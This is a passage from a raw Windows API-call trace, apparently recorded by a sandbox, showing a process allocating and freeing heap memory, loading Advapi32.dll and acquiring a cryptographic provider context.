0x2e512e0 [0252.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0252.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0252.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0252.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0252.532] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0252.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0252.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0252.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0252.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0252.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0252.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0252.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0252.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0252.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0252.533] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0252.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0252.533] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0252.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0252.533] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0252.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0252.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0252.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dd8 [0252.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0252.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0252.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0252.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0252.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0252.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0252.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0252.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0252.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0252.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0252.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0252.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0252.534] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0252.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0252.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0252.535] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0252.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0252.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0252.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0252.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0252.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0252.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0252.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0252.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0252.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0252.535] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0252.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0252.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0252.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0252.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0252.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0252.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0252.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0252.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0252.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0252.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0252.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0252.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0252.536] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0252.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0252.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0252.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0252.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0252.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0252.536] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0252.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0252.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0252.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0252.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0252.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0252.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0252.537] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.537] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0252.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55fb8 | out: hHeap=0x970000) returned 1 [0252.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0252.537] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0252.537] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0252.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0252.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0252.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0252.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69bc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0252.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0252.538] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0252.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0252.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0252.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0252.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0252.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0252.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0252.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0252.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0252.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0252.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0252.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0252.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0252.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0252.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0252.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0252.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0252.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0252.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0252.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0252.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0252.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0252.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0252.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0252.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0252.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0252.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0252.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0252.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0252.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0252.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0252.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0252.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0252.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0252.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0252.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0252.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0252.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0252.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0252.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0252.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0252.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0252.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0252.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0252.542] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0252.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0252.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0252.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0252.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0252.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0252.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0252.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0252.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0252.543] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0252.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0252.543] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0252.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0252.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0252.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0252.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0252.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0252.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0252.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0252.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0252.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0252.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0252.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0252.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0252.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0252.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0252.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0252.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0252.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0252.544] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0252.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0252.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0252.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0252.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0252.544] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0252.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0252.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0252.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0252.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0252.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0252.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0252.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0252.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0252.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0252.544] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0252.545] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 